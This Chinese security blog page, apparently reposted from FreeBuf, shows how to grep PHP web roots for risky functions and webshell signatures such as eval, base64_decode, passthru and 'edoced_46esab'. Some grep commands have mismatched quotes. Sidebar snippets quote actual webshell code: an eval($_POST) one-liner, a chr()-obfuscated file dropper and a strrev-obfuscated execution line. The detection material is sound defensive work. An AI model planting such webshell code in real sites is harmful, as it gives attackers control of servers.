利用grep查找webshell

最新推荐文章于 2024-02-11 23:53:11 发布
最新推荐文章于 2024-02-11 23:53:11 发布
阅读量1.4k 收藏
点赞数
分类专栏: web安全 文章标签: webshell

原文地址:http://www.freebuf.com/articles/4074.html

grep (global search regular expression(RE) and print out the line,全面搜索正则表达式并把行打印出来)是一种强大的文本搜索工具,它能使用正则表达式搜索文本,并把匹配的行打印出来。Unix的grep家族包括grep、egrep和fgrep。

利用grep命令我们可以查找常见的漏洞、webshell和其他恶意文件。本文使用的grep版本为2.9,如果你使用一个低于2.5.4的grep,那本片文章中的一些命令可能无法正常工作。可以用grep -v或grep -version确定一下版本。你也可以使用grep –help查看更多信息。如下图:

发现漏洞的常见方法:

为什么大多数web应用程序都会发现一些不安全的代码,就是因为调用了一些不安全的函数,而又未进行过滤。例如:命令注入或远程代码执行,可以执行客户端传递的参数。这里常常会用到shell_exec函数。我们可以用grep命令搜索文件中存在shell_exec函数的地方,如下:

grep -Rn shell_exec *(  /var/www

上图中,我们可以看到可能存在漏洞的函数行和路径。

另一个例子:include require include_once和require_once都是可能存在问题的地方,它可能会造成本地文件包含漏洞。我们可以使用grep查找出现该函数的地方然后进行测试判断,如下:

grep -Rn include *(” /var/www
grep -Rn require *(” /var/www
grep -Rn include_once *(” /var/www
grep -Rn require_once *(” /var/www

以上两个简单的例子可以做为白盒挖掘漏洞的参考,下面介绍一下查找webshell和其他恶意文件的方法:

常见的webshell都会包含一些功能,如执行命令、下载文件、编辑文件、反弹连接等行为。除了常见的shell_exec,base64_decode和eval,还有其他的一些特征码,比如phpspy2006中会包含“Version:2006,proxycontents”,phpspy2008中会包含“phpspypass,goaction(‘backconnect”等等。还有以下一些常见的特征:

phpinfo
system
php_uname
chmod
fopen
flclose
readfile
edoced_46esab
passthru

我们可以用grep搜索包含这些函数的文件,如下:

grep -Rn shell_exec *(” /var/www
grep -Rn base64_decode *(” /var/www
grep -Rn phpinfo *(” /var/www
grep -Rn system *(” /var/www
grep -Rn php_uname *(” /var/www
grep -Rn chmod *(” /var/www
grep -Rn fopen *(” /var/www
grep -Rn fclose *(” /var/www
grep -Rn readfile *(” /var/www
grep -Rn edoced_46esab *(” /var/www
grep -Rn eval *(” /var/www
grep -Rn passthru *(” /var/www

当然这些可以合并成一条命令,如下:

grep -RPn “(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval|tcpflood|udpflood|edoced_46esab) *\( /var/www
geeyeek
关注
专栏目录
【应急响应篇】Webshell应急响应指南
大河之犬的博客
04-20 1707
或者将当前网站目录文件与此前备份文件进行比对,查看是否存在新增的不一致内容,确定是否包含 Webshell 相关信息,并确定 Webshell 位置及创建时间。通过在网站目录发现的 Webshell 文件的创建时间,判断攻击者实施攻击的时间范围,以便后续依据此时间进行溯源分析、追踪攻击者的活动路径。通过日志发现的问题,针对攻击者活动路径,可排查网站存在的漏洞, 并进行分析(主要分析什么漏洞导致的webshell攻击)对已发现的漏洞进行漏洞复现,从而还原攻击者的活动路径。
JSP Webshell 免杀
悦分享
08-01 1662
上面提到JSP在第一次运行的时候会先被Web容器,如Tomcat翻译成Java文件,然后才会被Jdk编译成为Class加载到jvm虚拟机运行。JDK在编译的时候只看java文件的格式是否正确。而Tomcat在翻译JSP的不会检查其是否合乎语法。...
如何查找Linux服务器上查找webshell
enough_br的专栏
01-10 3265
最近discuz论坛出现很多用户无法登陆,账号被删除等现象,查看数据库发现很多用户账号被恶意删除了,检查发现是通过执行discuz内部批量删除函数删除的,就是不知道他怎么执行这个函数的。一开始以为是通过webshell执行的,所以在这里记录一下服务器查找webshell的方法及过程。 1.discuz后台有一个文件校对的功能文件校验是针对 Discuz! 官方发布的文件为基础进行核对,能
linux查找webshell
weixin_33709609的博客
01-09 159
首先认识一下小马,一般大马容易暴露,骇客都会留一手,把小马加入正常PHP文件里面<?php eval ($_POST[a]);?>//密码为a,使用国菜刀连接隐藏很深的小马fputs(fopen(chr(46).chr(47).chr(97)……省略解码:其chr括号里面的数字是美国信息交换标准代码,缩写:ASCII 可以找一份对照表对应一下比如46 就是 ....
php查询webshell,linux查找webshell
weixin_42317115的博客
03-22 257
首先认识一下小马,一般大马容易暴露,骇客都会留一手,把小马加入正常PHP文件里面 //密码为a,使用国菜刀连接隐藏很深的小马fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr...
ECSC课堂 | 应急响应之如何快速定位Webshell文件
安胜ANSCEN的博客
04-27 863
黑客在入侵了一个网站后,通常会将后门文件与网站服务器Web目录下正常的网页文件混在一起,然后就可以使用特定工具来访问Webshell后门,获得命令执行环境,达到控制网站服务器的目的。除了指定“修改日期”(datemodified)外,还可以指定“创建日期”(datecreated)、“访问日期”(dateaccessed)。包括非索引位置,单击“搜索工具”的“高级选项”,然后选“系统文件”。- 修改时间:在属性保存的最后一次修改的时间。- 访问时间:在属性保存的最后一次访问的时间。
用ZendGuard 加密php webshell
Coisini的博客
06-09 484
现在很多linux管理员都会一招,grep eval 大法,查找那些年错过的webshell,那些年错过的基友们苦思冥想出了对抗的办法。 ZendGuard是一款php的加密工具,它可以编译php源码变为字节码,类似于java的虚拟机的字节码,然后让zend虚拟机运行字节码,以此来提高php的运行速度,因为不用虚拟机,php运行脚本的方式是读一行代码,运行一行,效率很低,而虚拟机则效率高多了,题...
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 016-网络安全应急技术与实践(Web层-应急响应技术总结)
热门推荐
时光隧道
02-11 7万+
Web安全事件应急响应技术是指针对Web应用程序遭受风险和安全漏洞的事件,如网络攻击、数据泄露、恶意软件等,迅速采取措施进行监测、分析和应对的技术手段。应急响应技术描述1. 监测和日志分析通过实时监测和分析Web应用程序的日志,以便发现异常活动和潜在的安全威胁。2. 威胁情报收集与分析收集和分析来自多个来源的威胁情报,以帮助识别和应对潜在威胁。3. 漏洞扫描和漏洞管理通过定期对Web应用程序进行漏洞扫描,及时发现和修复潜在的安全漏洞。4. 网络流量分析
利用平台的漏洞
qq_35192121的博客
11-07 131
在这一章节,我们将使用 Hashcat 暴力破解哈希。SUID位:当在程序或脚本的属性设置此位时,此类程序将在所有者用户的权限下执行而不是在执行它的用户的权限下执行。获取到目标主机的shell后我们尝试使用命 getsystem命快速提权,然而没有起作用,所以我们只好在 Explot-DB 数据查找其他的可用的模块,该模块可直接用于metasploit,只需要加载它并未它设置反向连接的IP 和端口即可,它便会利用我们已经获得到的session会话尝试执行提权操作,一旦成功,就会返回新的shell
phpspy2010 绕过登陆漏洞解析
03-25
NULL 博文链接:https://wcf1987.iteye.com/blog/1180028
PhpSpy各个版本都有
10-31
PhpSpy是一个用PHP语言编写的在线管理程序,同时集成很多和海阳顶端网所类似的功能,也可以说是一个WEB方式的后门,结合现有的攻击手法,本着实用、简洁、小巧的原则,开发了这个程序。由于程序性质问题,公开提供下载的版本不会提供更多的操作。例如MSSQL连接、WIN主机反弹等。
shell统计当前文件夹下的文件个数、目录个数
11-16 1万+
shell统计当前文件夹下的文件个数、目录个数 ls -l |grep "^-"|wc -l //统计当前文件夹下文件个数 ls -l |grep "^d"|wc -l //统计当前文件夹下目录的个数 ls -lR|grep "^-"|wc -l //统计当前文件夹下文件个数,包括子文件夹里的 ls -lR|grep "^d"|wc -l //统计文件夹下目录的个数,包括子文件夹里的 命令拆解 grep "^-" //这里将长列表输出信息过滤一部分,只保留一般文件,如果只保留目录
【转】Webshell入侵检测初探
tpriwwq的专栏
06-13 1627
0×01:Webshell简介 攻击者在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。常见攻击方式有:直接上传获取webshell、SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本(XSS)作为攻击的一部分,甚至一些比较老旧的方法利用后台数据库备份及恢复获取webshell、数据库压缩等。通用功能包括但不限于shell命...
Webshell_box-黑吃黑
qq_39756628的博客
05-18 239
木马路径: E:\SCAN\PHP大马\新建文件夹\webshell-master\php\phpspy\phpspy_2006.php 环境: win2003克隆 :192.168.4.8 (箱子) win2008克隆: 192.168.4.4 (肉鸡) 木马添加木马: $url=$_SERVER['HTTP_HOST']. $_SERVER['PHP_SELF']; echo $url; 然后进行修改,指向信封 再次访问木马: 信封也会有记录 ...
php 运行客户提交代码(攻击)和运行图片的代码
weixin_30682127的博客
03-06 289
1、$a=@strrev(ecalper_gerp);$b=@strrev(edoced_46esab);@$a($b(L3h4L2Ug),$_POST[POST],bxxb); 2、<?phpeval($_POST[cmd])?> 3、运行图片的PHP代码,include 1.jpg; 转载于:https://www.cnblogs.com/hech...
php语句 绕过验证,由php字符offset特征造成的绕过漏洞详解
weixin_26870313的博客
03-10 219
php的字符offset特性php的字符串存在一个非常有趣的特性,php的字符串也可以像数组一样进行取值。$test = "hello world";echo $test[0];最后的结果就是h。但是上述的这种特性有时会有意想不到的效果,看下面这段代码$mystr = "hello world";echo $mystr["pass"];上述的代码的输出结果是h.这是为什么呢?其实很简单,和很...
获取Webshell的常用方法(一)
Captain_RB的博客
12-03 1万+
Webshell是以php、asp、jsp等网站脚本文件形式存在的一种网页后门,攻击者可以利用web请求的方式,获得webshell,控制网站服务器,进而进行执行命令、上传下载文件等操作。本文主要介绍在渗透测试过程获取Webshell的基本思路,实战还需就地取材,灵活应对。
php正则查找,精确查找PHP WEBSHELL木马 修正版
weixin_29767917的博客
03-09 301
先来看下反引号可以成功执行命名的代码片段。代码如下:复制代码 代码如下:`ls -al`;`ls -al`;echo "sss"; `ls -al`;$sql = "SELECT `username` FROM `table` WHERE 1";$sql = 'SELECT `username` FROM `table` WHERE 1'/*无非是 前面有空白字符,或者在一行代码的结束之后,后面接...
webshell 应急
最新发布
08-22
Webshell是一种恶意软件或工具,通常用于远程控制服务器上的网站。它允许攻击者通过网络间接地执行命令、上传文件等操作,就像他们直接登录到服务器一样。应急处理webshell的情况通常包括以下几个步骤: 1. **立即断开连接**:发现Webshell后,应尽快从服务器上断开所有不必要的连接,防止攻击者进一步利用。 2. **清除证据**:移除已知的webshell文件,并检查服务器日志,清理可能留下的痕迹。 3. **安全扫描**:进行全面的安全审计,查找可能存在的其他漏洞并修复它们。 4. **更新补丁**:确保服务器操作系统和应用程序有最新的安全补丁,以防止新的攻击手段。 5. **防火墙策略调整**:强化防火墙规则,限制对敏感目录的访问权限。 6. **备份恢复**:如果数据被破坏,确保有可用的数据备份,以便必要时进行恢复。 7. **通知相关人员**:向IT团队、安全专家以及可能受影响的用户报告情况。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值